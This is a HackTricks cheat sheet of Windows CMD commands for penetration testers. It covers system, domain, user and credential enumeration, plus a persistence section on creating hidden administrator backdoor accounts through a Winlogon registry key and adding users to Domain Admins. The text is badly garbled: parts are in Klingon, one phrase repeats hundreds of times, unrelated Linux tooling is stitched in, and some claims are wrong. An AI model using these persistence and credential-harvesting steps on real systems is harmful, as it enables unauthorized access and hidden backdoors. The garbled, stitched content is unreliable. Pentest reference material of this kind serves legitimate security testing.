hacktricks/windows-hardening/basic-cmd-for-pentesters.md

Basic Win CMD for Pentesters

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

System info

Version and Patches info

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info

wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates

hostname

DRIVERQUERY #3rd party driver vulnerable?

Qa'chuq

Introduction

The Windows command prompt, also known as CMD, is a powerful tool for pentesters. It allows you to interact with the operating system and execute various commands. In this section, we will cover some basic CMD commands that can be useful during a penetration test.

CMD Commands

1. dir

The dir command is used to list the files and directories in the current directory. It provides information such as the file name, size, and last modified date.

dir

2. cd

The cd command is used to change the current directory. You can specify the directory path as an argument to navigate to a specific directory.

cd C:\Windows\System32

3. echo

The echo command is used to display messages or enable/disable the echoing of commands in the command prompt.

echo Hello, world!

4. type

The type command is used to display the contents of a text file.

type C:\Users\user\Desktop\file.txt

5. copy

The copy command is used to copy files from one location to another.

copy C:\Users\user\Desktop\file.txt C:\Windows\System32

6. move

The move command is used to move files from one location to another.

move C:\Users\user\Desktop\file.txt C:\Windows\System32

7. del

The del command is used to delete files.

del C:\Windows\System32\file.txt

8. tasklist

The tasklist command is used to display a list of running processes.

tasklist

9. taskkill

The taskkill command is used to terminate a running process.

taskkill /PID 1234

10. netstat

The netstat command is used to display active network connections.

netstat -ano

11. ipconfig

The ipconfig command is used to display the IP configuration of the computer.

ipconfig

12. ping

The ping command is used to test the connectivity between two network devices.

ping 192.168.1.1

13. tracert

The tracert command is used to trace the route that packets take to reach a destination.

tracert www.example.com

14. net

The net command is used to manage network resources.

net user

15. whoami

The whoami command is used to display the current user.

whoami

Conclusion

These are just a few of the basic CMD commands that can be useful during a penetration test. Familiarizing yourself with these commands will help you navigate and interact with the Windows operating system more effectively.

set #List all environment variables

Some env variables to highlight:

• COMPUTERNAME: Name of the computer
• TEMP/TMP: Temp folder
• USERNAME: Your username
• HOMEPATH/USERPROFILE: Home directory
• windir: C:\Windows
• OS:Windos OS
• LOGONSERVER: Name of domain controller
• USERDNSDOMAIN: Domain name to use with DNS
• USERDOMAIN: Name of the domain

---

Some env variables to highlight:

• COMPUTERNAME: qo'noS nom
• TEMP/TMP: temp qach
• USERNAME: SuvwI' neH
• HOMEPATH/USERPROFILE: yuDwI' qach
• windir: C:\Windows
• OS: Windos OS
• LOGONSERVER: Domain controller nom
• USERDNSDOMAIN: DNS jatlh nom
• USERDOMAIN: Domain nom

nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC

Qa'Hom QaD

Disk Information

To view the mounted disks on a Windows system, you can use the wmic command. Open a command prompt and run the following command:

wmic logicaldisk get caption, description, volumename

This will display the caption (drive letter), description, and volume name for each mounted disk.

Disk Usage

To check the disk usage of a specific drive, you can use the dir command. Open a command prompt and run the following command, replacing C: with the drive letter you want to check:

dir C:

This will display the total size, free space, and used space of the specified drive.

Disk Management

To manage disks and partitions on a Windows system, you can use the diskpart command. Open a command prompt and run the following command:

diskpart

This will open the DiskPart command-line utility. From here, you can use various commands to manage disks, partitions, and volumes. Some commonly used commands include:

• list disk: Lists all disks on the system.
• select disk <disk_number>: Selects a specific disk for further operations.
• list partition: Lists all partitions on the selected disk.
• select partition <partition_number>: Selects a specific partition for further operations.
• format fs=<filesystem> quick: Formats the selected partition with the specified file system (e.g., NTFS, FAT32).
• assign letter=<drive_letter>: Assigns a drive letter to the selected partition.

Remember to be cautious when using the diskpart command, as it can have permanent effects on your system's disk configuration.

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

Defender

Qa'Hom QaD

---

dir C:\$Recycle.Bin /s /b

qo'noS, qutlh, je Software

Processes (Qap)

Processes are running instances of programs on a computer. They can be system processes or user processes. System processes are essential for the operating system to function properly, while user processes are initiated by users or applications.

List Processes (Qapmey roD)

To list all running processes on a Windows system, you can use the tasklist command.

tasklist

Kill a Process (Qap 'oH)

To terminate a running process, you can use the taskkill command followed by the process ID (PID) or the process name.

taskkill /PID <PID>
taskkill /IM <process_name>

Services (qutlh)

Services are background processes that run continuously on a Windows system. They provide functionality to the operating system or other applications. Services can be started, stopped, or configured using the sc command.

List Services (qutlhmey roD)

To list all services on a Windows system, you can use the sc command with the query parameter.

sc query

Start/Stop a Service (qutlh 'oH)

To start or stop a service, you can use the sc command with the start or stop parameter followed by the service name.

sc start <service_name>
sc stop <service_name>

Software (Software)

Software refers to the programs and applications installed on a computer. It can include operating systems, productivity tools, utilities, and more.

List Installed Software (Softwaremey roD)

To list all installed software on a Windows system, you can use the wmic command with the product parameter.

wmic product get name,version

Uninstall Software (Software 'oH)

To uninstall software from a Windows system, you can use the wmic command with the product parameter and the call uninstall method followed by the product name.

wmic product where name="<product_name>" call uninstall

Summary (Qap, qutlh, je Software)

Understanding processes, services, and software is essential for a pentester. Being able to list, terminate, start, stop, and uninstall them can help in identifying vulnerabilities and securing a system.

schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

Domain info

Domain enumeration

Whois

To gather information about a domain, you can use the whois command. This command retrieves the registration details of a domain, including the owner's contact information, registration date, and expiration date.

whois example.com

DNS enumeration

To enumerate the DNS records of a domain, you can use the nslookup command. This command allows you to query the DNS server for various types of records, such as A, AAAA, MX, NS, and TXT records.

nslookup example.com

Zone transfer

Zone transfer is a technique used to obtain a complete copy of a DNS zone from a primary DNS server. This can be useful for gathering information about the domain's infrastructure and identifying potential vulnerabilities.

nslookup
> server <DNS server>
> ls -d example.com

Subdomain enumeration

Sublist3r

Sublist3r is a tool that allows you to enumerate subdomains of a domain using various search engines. It can be installed using the following command:

pip install sublist3r

To use Sublist3r, run the following command:

sublist3r -d example.com

Amass

Amass is another powerful tool for subdomain enumeration. It can be installed using the following command:

snap install amass

To use Amass, run the following command:

amass enum -d example.com

Subfinder

Subfinder is a tool that uses passive online sources to enumerate subdomains. It can be installed using the following command:

go get -u github.com/projectdiscovery/subfinder/cmd/subfinder

To use Subfinder, run the following command:

subfinder -d example.com

Email enumeration

TheHarvester

TheHarvester is a tool that allows you to gather email addresses associated with a domain. It can be installed using the following command:

pip install theharvester

To use TheHarvester, run the following command:

theharvester -d example.com -b all

Hunter.io

Hunter.io is a web-based tool that allows you to find email addresses associated with a domain. Simply visit the Hunter.io website and enter the domain name to search for email addresses.

Conclusion

Domain enumeration is an essential step in the reconnaissance phase of a penetration test. By gathering information about a domain, you can identify potential attack vectors and vulnerabilities that can be exploited.

# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list	#Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

logmey & chutlhmeH

Windows Event Logs

Windows Event Logs are a valuable source of information for pentesters. They contain records of various events that occur on a Windows system, such as system startup, user logins, application crashes, and security-related events. These logs can be accessed using the Event Viewer tool or through the command line.

Event Viewer

The Event Viewer is a graphical tool that allows you to view and analyze Windows Event Logs. To open the Event Viewer, you can use the following command:

eventvwr.msc

Once the Event Viewer is open, you can navigate through different log categories, such as Application, Security, and System, to view specific events. You can also filter events based on various criteria, such as event ID, source, or date and time.

Command Line

In addition to the Event Viewer, you can also access Windows Event Logs using the command line. The wevtutil command-line tool provides various options to query and manage event logs.

To list all available event logs, you can use the following command:

wevtutil el

To query events from a specific log, you can use the following command:

wevtutil qe <log_name>

Replace <log_name> with the name of the log you want to query, such as Application, Security, or System. You can also use additional parameters to filter the events based on specific criteria.

Event Log Files

Windows Event Logs are stored as binary files with the extension .evtx. These files are located in the %SystemRoot%\System32\winevt\Logs directory. Each log file corresponds to a specific log category, such as Application.evtx, Security.evtx, or System.evtx.

To access the log files directly, you can use the following command:

cd %SystemRoot%\System32\winevt\Logs

From there, you can copy the log files to a different location for further analysis.

Sysmon Logs

Sysmon is a powerful tool that provides detailed information about system activity. It can be used to monitor and detect malicious activity on a Windows system. Sysmon logs can be accessed using the Event Viewer or the command line.

Event Viewer

To view Sysmon logs using the Event Viewer, you can navigate to the Applications and Services Logs category and then select Microsoft, followed by Windows, and finally Sysmon.

Command Line

To access Sysmon logs using the command line, you can use the following command:

wevtutil qe Microsoft-Windows-Sysmon/Operational

This command will display the Sysmon logs in the command prompt.

Sysmon Log Files

Sysmon logs are stored as binary files with the extension .evtx. These files are located in the %SystemRoot%\System32\winevt\Logs directory, just like Windows Event Logs. The Sysmon log file is named Microsoft-Windows-Sysmon%4Operational.evtx.

To access the Sysmon log file directly, you can use the following command:

cd %SystemRoot%\System32\winevt\Logs

From there, you can copy the Sysmon log file to a different location for further analysis.

#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

List all users

net user

Get detailed information about a specific user

net user <username>

Create a new user

net user <username> <password> /add

Delete a user

net user <username> /delete

Change a user's password

net user <username> <new_password>

Disable a user account

net user <username> /active:no

Enable a user account

net user <username> /active:yes

Groups

List all groups

net localgroup

Get detailed information about a specific group

net localgroup <groupname>

Add a user to a group

net localgroup <groupname> <username> /add

Remove a user from a group

net localgroup <groupname> <username> /delete

Create a new group

net localgroup <groupname> /add

Delete a group

net localgroup <groupname> /delete

Add a group to another group

net localgroup <groupname> /add <othergroupname>

Remove a group from another group

net localgroup <groupname> /delete <othergroupname>

#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users looged
qwinsta #Anyone else logged in?

#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe

Qa'Hom

Qa'Hom Daq

Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej Qa'Hom Daq, 'ej

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

List sessions

$ net session

This command lists the active sessions on the target machine. It provides information such as the username, computer name, and session ID for each session.

qwinsta
klist sessions

lo'laHbe' Qap

The password policy is a set of rules and requirements that dictate the characteristics of passwords used within a system. These policies are put in place to enhance the security of user accounts and prevent unauthorized access. Here are some common elements of a password policy:

• Password Length: The minimum and maximum number of characters allowed in a password. Longer passwords are generally more secure.
• Complexity: The use of a combination of uppercase and lowercase letters, numbers, and special characters to create a strong password.
• Expiration: The frequency at which passwords must be changed. Regularly changing passwords reduces the risk of compromise.
• History: The number of previous passwords that cannot be reused. This prevents users from cycling through a small set of passwords.
• Lockout: The number of failed login attempts allowed before an account is locked. This protects against brute-force attacks.
• Account Lockout Duration: The length of time an account remains locked after reaching the maximum number of failed login attempts.
• Password Recovery: The process for recovering a forgotten password, often involving security questions or email verification.

By implementing a strong password policy, organizations can significantly improve the security of their systems and protect sensitive information from unauthorized access.

net accounts

Qaw' Credentials

Credentials are the keys to the kingdom when it comes to hacking. They are the usernames and passwords that grant access to various systems, applications, and services. As a hacker, obtaining and exploiting credentials is a crucial part of your job.

There are several techniques you can use to gather credentials:

1. Phishing: This involves tricking users into revealing their credentials by posing as a legitimate entity, such as a bank or an email provider. Phishing attacks can be carried out through email, social media, or even phone calls.

2. Brute-forcing: This technique involves systematically trying all possible combinations of usernames and passwords until the correct one is found. Brute-forcing can be time-consuming and resource-intensive, but it can be effective if the target has weak or easily guessable credentials.

3. Password spraying: Instead of trying multiple passwords for a single user, password spraying involves trying a single password across multiple user accounts. This technique takes advantage of the fact that many users tend to reuse passwords across different accounts.

4. Credential stuffing: This technique involves using a list of known usernames and passwords obtained from previous data breaches to gain unauthorized access to other accounts. Many users have a tendency to reuse passwords, making credential stuffing a viable attack vector.

5. Keylogging: Keyloggers are malicious software or hardware devices that record every keystroke made on a compromised system. By capturing keystrokes, hackers can obtain usernames and passwords as users type them.

6. Man-in-the-middle (MITM) attacks: In a MITM attack, the hacker intercepts the communication between two parties and captures any credentials exchanged during the process. This can be done by exploiting vulnerabilities in the network or by using tools like ARP spoofing.

Remember, obtaining credentials is just the first step. Once you have them, you can use them to gain unauthorized access to systems, escalate privileges, and carry out further attacks. However, it's important to note that hacking into systems without proper authorization is illegal and unethical. Always ensure you have the necessary permissions and legal rights before attempting any hacking activities.

cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access

Persistence with users

Introduction

In order to maintain persistence on a compromised system, it is important to establish a backdoor that allows access even after the initial compromise has been remediated. One common method of achieving this is by creating a new user account with administrative privileges. This user account can then be used to regain access to the system at a later time.

Creating a New User Account

To create a new user account on a Windows system, you can use the net user command. This command allows you to add, modify, or delete user accounts. To create a new user account with administrative privileges, follow these steps:

1. Open a command prompt with administrative privileges.
2. Use the following command to create a new user account:

net user <username> <password> /add

Replace <username> with the desired username for the new account and <password> with the desired password.

3. Use the following command to add the new user account to the local administrators group:

net localgroup administrators <username> /add

Replace <username> with the username of the new account.

Hiding the User Account

To maintain stealth and avoid detection, it is recommended to hide the newly created user account from the Windows login screen. This can be achieved by modifying the Windows registry. Follow these steps to hide the user account:

1. Open the Windows registry editor by running the regedit command.
2. Navigate to the following registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

3. Create a new DWORD value with the same name as the username of the user account you want to hide.
4. Set the value of the DWORD to 0 to hide the user account.

Conclusion

By creating a new user account with administrative privileges and hiding it from the Windows login screen, you can establish persistence on a compromised system. This allows you to regain access even after the initial compromise has been remediated. However, it is important to note that these techniques should only be used for ethical purposes, such as penetration testing or authorized system administration.

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
